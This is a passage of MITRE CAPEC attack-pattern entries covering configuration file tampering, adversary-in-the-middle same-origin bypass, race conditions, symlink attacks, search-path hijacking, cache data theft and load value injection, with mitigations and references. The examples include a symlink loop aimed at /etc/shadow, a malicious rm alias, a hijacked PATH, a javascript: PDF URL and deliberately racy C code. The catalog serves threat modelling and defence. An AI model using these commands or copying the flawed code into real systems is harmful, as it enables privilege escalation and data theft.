Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Design: Enforce principle of least privilege

Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.

Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.

Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.

Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute.

Example Instances

Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix "cp" command can be rerouted to "rm" or other standard command so the user's intention is subverted.

The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.

Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)

http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here

The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.

The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality.

< security-constraint>

<description>Security processing rules for admin screens</description>
<url-pattern>/admin/*</url-pattern>
<http-method>POST</http-method>
<http-method>GET</http-method>

<auth-constraint>

<role-name>administrator</role-name>
<role-name>public</role-name>

</auth-constraint>

</security-constraint>

The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.

Related Weaknesses

CWE-ID	Weakness Name
94	Improper Control of Generation of Code ('Code Injection')
96	Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')
95	Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
97	Improper Neutralization of Server-Side Includes (SSI) Within a Web Page
272	Least Privilege Violation
59	Improper Link Resolution Before File Access ('Link Following')
282	Improper Ownership Management
270	Privilege Context Switching Error

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1027.006	Obfuscated Files or Information: HTML Smuggling
1027.009	Obfuscated Files or Information: Embedded Payloads
1564.009	Hide Artifacts: Resource Forking

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, Examples-Instances, Related_Attack_Patterns, Type (Attack_Pattern -> Relationship)
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Taxonomy_Mappings

CAPEC-466: Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy

Attack Pattern ID: 466

Abstraction: Standard

View customized information:

Description

Extended Description

When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active adversary in the middle attacker intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL

Skills Required

[Level: Low]

Ability to intercept and modify requests / responses

[Level: Medium]

Ability to create iFrame and JavaScript code that would initiate unauthorized requests to sensitive sites from the victim's browser

[Level: Medium]

Solid understanding of the HTTP protocol

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands

Mitigations

Design: Tunnel communications through a secure proxy

Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)

Related Weaknesses

CWE-ID	Weakness Name
300	Channel Accessible by Non-Endpoint

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-403] Roi Saltzman and Adi Sharabani. "Active Man in the Middle Attacks". IBM Rational Application Security Group. 2009-02-02. <http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Consequences, Description, Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated @Name, Description, Prerequisites
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2021-06-24 (Version 3.5)	Leveraging Active Man in the Middle Attacks to Bypass Same Origin Policy

CAPEC-26: Leveraging Race Conditions

Attack Pattern ID: 26

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	29	Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate Timing and State

Execution Flow

Explore

The adversary explores to gauge what level of access they have.

Experiment

The adversary gains access to a resource on the target host. The adversary modifies the targeted resource. The resource's value is used to determine the next normal execution action.

Exploit

The resource is modified/checked concurrently by multiple processes. By using one of the processes, the adversary is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the adversary to abuse the target host.

Prerequisites

A resource is accessed/modified concurrently by multiple processes such that a race condition exists.

The adversary has the ability to modify the resource.

Skills Required

[Level: Medium]

Being able to "run the race" requires basic knowledge of concurrent processing including synchonization techniques.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

Use safe libraries to access resources such as files.

Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.

Use synchronization to control the flow of execution.

Use static analysis tools to find race conditions.

Pay attention to concurrency problems related to the access of resources.

Example Instances

The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057

The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name (see [REF-107]).

include <sys/types.h>
include <fcntl.h>
include <unistd.h>

define FILE "/tmp/myfile"
define UID 100

void test(char *str)
{

int fd;
fd = creat(FILE, 0644);
if(fd == -1)

return;

chown(FILE, UID, -1); /* BAD */
close(fd);

}

int main(int argc, char **argv)
{

char *userstr;
if(argc > 1) {

userstr = argv[1];
test(userstr);

}
return 0;

}

Related Weaknesses

CWE-ID	Weakness Name
368	Context Switching Race Condition
363	Race Condition Enabling Link Following
366	Race Condition within a Thread
370	Missing Check for Certificate Revocation after Initial Check
362	Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
662	Improper Synchronization
689	Permission Race Condition During Resource Copy
667	Improper Locking
665	Improper Initialization
1223	Race Condition for Write-Once Attributes
1254	Incorrect Comparison Logic Granularity
1298	Hardware Logic Contains Race Conditions

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-105] "Wikipedia". Race condition. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Race_condition>.

[REF-106] David Wheeler. "Secure programmer: Prevent race conditions". IBM developerWorks. IBM. <http://www.ibm.com/developerworks/linux/library/l-sprace/index.html>.

[REF-107] Fortify Software. "SAMATE - Software Assurance Metrics And Tool Evaluation". Test Case ID 1598. National Institute of Standards and Technology (NIST). 2006-06-22. <http://samate.nist.gov/SRD/view_testcase.php?tID=1598>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References, Solutions_and_Mitigations
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances, Execution_Flow, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-27: Leveraging Race Conditions via Symbolic Links

Attack Pattern ID: 27

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	29	Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Timing and State

Execution Flow

Explore

Verify that target host's platform supports symbolic links.: This attack pattern is only applicable on platforms that support symbolic links.
Techniques
Research target platform to determine whether it supports symbolic links.
Create a symbolic link and ensure that it works as expected on the given platform.

Examine application's file I/O behavior: Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.

Techniques
Use kernel tracing utility such as ktrace to monitor application behavior.
Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls
Watch temporary directories to see when temporary files are created, modified and deleted.
Analyze source code for open-source systems like Linux, Apache, etc.

Experiment

Verify ability to write to filesystem: The attacker verifies ability to write to the target host's file system.

Techniques
Create a file that does not exist in the target directory (e.g. "touch temp.txt" in UNIX-like systems)
On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.
Verify permissions on target directory

Exploit

Replace file with a symlink to a sensitive system file.: Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.

Techniques

Create an infinite loop containing commands such as "rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) "rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.

Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it.

Prerequisites

The attacker is able to create Symlink links on the target host.

Tainted data from the attacker is used and copied to temporary files.

The target host does insecure temporary file creation.

Skills Required

[Level: Medium]

This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them).

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges
Availability	Resource Consumption

Mitigations

Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing.

Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.

Follow the principle of least privilege when assigning access rights to files.

Ensure good compartmentalization in the system to provide protected areas that can be trusted.

Example Instances

In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For "efficiency," it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.

The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with "user" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. "user password")) in it. It removes the temporary file (merely removing the symbolic link).

Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.

[REF-115]

GNU "ed" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939

OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894

Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972

Related Weaknesses

CWE-ID	Weakness Name
367	Time-of-check Time-of-use (TOCTOU) Race Condition
61	UNIX Symbolic Link (Symlink) Following
662	Improper Synchronization
689	Permission Race Condition During Resource Copy
667	Improper Locking

References

[REF-115] "Wikipedia". Symlink race. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Symlink_race>.

[REF-116] "mkstemp". IEEE Std 1003.1, 2004 Edition. The Open Group Base Specifications Issue 6. <http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Examples-Instances
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances

CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions

Attack Pattern ID: 29

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	26	Leveraging Race Conditions
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	27	Leveraging Race Conditions via Symbolic Links

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Timing and State

Execution Flow

Explore

The adversary explores to gauge what level of access they have.

Experiment

The adversary confirms access to a resource on the target host. The adversary confirms ability to modify the targeted resource.

Exploit

The adversary decides to leverage the race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary can replace the resource and cause an escalation of privilege.

Prerequisites

A resource is access/modified concurrently by multiple processes.

The adversary is able to modify resource.

A race condition exists while accessing a resource.

Skills Required

[Level: Medium]

This attack can get sophisticated since the attack has to occur within a short interval of time.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Alter Execution Logic
Confidentiality	Read Data
Availability	Resource Consumption

Mitigations

Use safe libraries to access resources such as files.

Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.

Use synchronization to control the flow of execution.

Use static analysis tools to find race conditions.

Pay attention to concurrency problems related to the access of resources.

Example Instances

The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an adversary can replace the file referenced by the name.

include <sys/types.h>
include <fcntl.h>
include <unistd.h>

define FILE "/tmp/myfile"
define UID 100

void test(char *str)
{

int fd;
fd = creat(FILE, 0644);
if(fd == -1)

return;

chown(FILE, UID, -1); /* BAD */
close(fd);

}

int main(int argc, char **argv)
{

char *userstr;
if(argc > 1) {

userstr = argv[1];
test(userstr);

}
return 0;

}

[REF-107]

Related Weaknesses

CWE-ID	Weakness Name
367	Time-of-check Time-of-use (TOCTOU) Race Condition
368	Context Switching Race Condition
366	Race Condition within a Thread
370	Missing Check for Certificate Revocation after Initial Check
362	Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
662	Improper Synchronization
691	Insufficient Control Flow Management
663	Use of a Non-reentrant Function in a Concurrent Context
665	Improper Initialization

References

[REF-131] J. Viega and G. McGraw. "Building Secure Software". Addison-Wesley. 2002.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-38: Leveraging/Manipulating Configuration File Search Paths

Attack Pattern ID: 38

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	159	Redirect Access to Libraries

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The attacker must be able to write to redirect search paths on the victim host.

Skills Required

[Level: Low]

To identify and execute against an over-privileged system interface

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Design: Enforce principle of least privilege

Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program

Implementation: Host integrity monitoring

Example Instances

Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command "rm" could be aliased to "mv" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting

alias rm=mv /usr/home/attacker

In this case the attacker retains a copy of all the files the victim attempts to remove.

A standard UNIX path looks similar to this

/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin

If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:

/evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin

This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.

Related Weaknesses

CWE-ID	Weakness Name
426	Untrusted Search Path
427	Uncontrolled Search Path Element

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1574.007	Hijack Execution Flow: Path Interception by PATH Environment Variable
1574.009	Hijack Execution Flow: Path Interception by Unquoted Path

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, Examples-Instances, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Taxonomy_Mappings

CAPEC-204: Lifting Sensitive Data Embedded in Cache

Attack Pattern ID: 204

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	167	White Box Reverse Engineering
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Identify Application Cache: An adversary first identifies an application that utilizes a cache. This could either be a web application storing data in a browser cache, or an application running on a separate machine. The adversary examines the cache to determine file permissions and possible encryption.
Techniques
Use probing tools to look for application cache files on a machine.
Use a web application and determine if any sensitive information is stored in browser cache.

Experiment

Attempt to Access Cache: Once the cache has been discovered, the adversary attempts to access the cached data. This often requires previous access to a machine hosting the target application.

Techniques
Use priviledge escalation to access cache files that might have strict privileges.
If the application cache is encrypted with weak encryption, attempt to understand the encryption technique and break the encryption.

Exploit

Lift Sensitive Data from Cache: After gaining access to cached data, an adversary looks for potentially sensitive information and stores it for malicious use. This sensitive data could possibly be used in follow-up attacks related to authentication or authorization.
Techniques
Using a public computer, or gaining access to a victim's computer, examine browser cache to look for sensitive data left over from previous sessions.

Prerequisites

The target application must store sensitive information in a cache.

The cache must be inadequately protected against attacker access.

Resources Required

The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file.

Related Weaknesses

CWE-ID	Weakness Name
524	Use of Cache Containing Sensitive Information
311	Missing Encryption of Sensitive Data
1239	Improper Zeroization of Hardware Register
1258	Exposure of Sensitive System Information Due to Uncleared Debug Information

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1005	Data from Local System

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Lifting cached, sensitive data embedded in client distributions (thick or thin)

CAPEC-696: Load Value Injection

Attack Pattern ID: 696

Abstraction: Detailed

View customized information:

Description

Extended Description

This attack is a mix of techniques used in traditional Meltdown and Spectre attacks. It uses microarchitectural data leakage combined with code gadget abuse. Intel has identified that this attack is not applicable in scenarios where the OS and the VMM (Virtual Memory Manager) are both trusted. Because of this, Intel SGX is a prime target for this attack because it assumes that the OS or VMM may be malicious.

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources, Manipulate Timing and State
Supply Chain Risks	Sustainment

Execution Flow

Explore

Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack. The adversary looks for code gadgets which will allow them to load an adversary-controlled value into trusted memory. They also look for code gadgets which might operate on this controlled value.
Techniques
Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

Experiment

Fill microarchitectural buffer with controlled value: The adversary will utilize the found code gadget from the previous step to load a value into a microarchitectural buffer.

Techniques
The adversary may choose the controlled value to be memory address of sensitive information that they want the system to access
The adversary may choose the controlled value to be the memory address of other code gadgets that they wish to execute by hijacking the control flow of the system

Set up instruction to page fault or microcode assist: The adversary must manipulate the system such that a page fault or microcode assist occurs when a valid instruction is run. If the instruction that fails is near where the adversary-controlled value was loaded, the system may forward this value from the microarchitectural buffer incorrectly.

Techniques
When targeting Intel SGX enclaves, adversaries that have privileges can manipulate PTEs to provoke page-fault exceptions or microcode assists.
When targeting Intel SGX enclaves, adversaries can indirectly revoke permissions for enclave code through the “mprotect” system call
An adversary can evict selected virtual memory pages using legacy interfaces or by increasing physical memory utilization
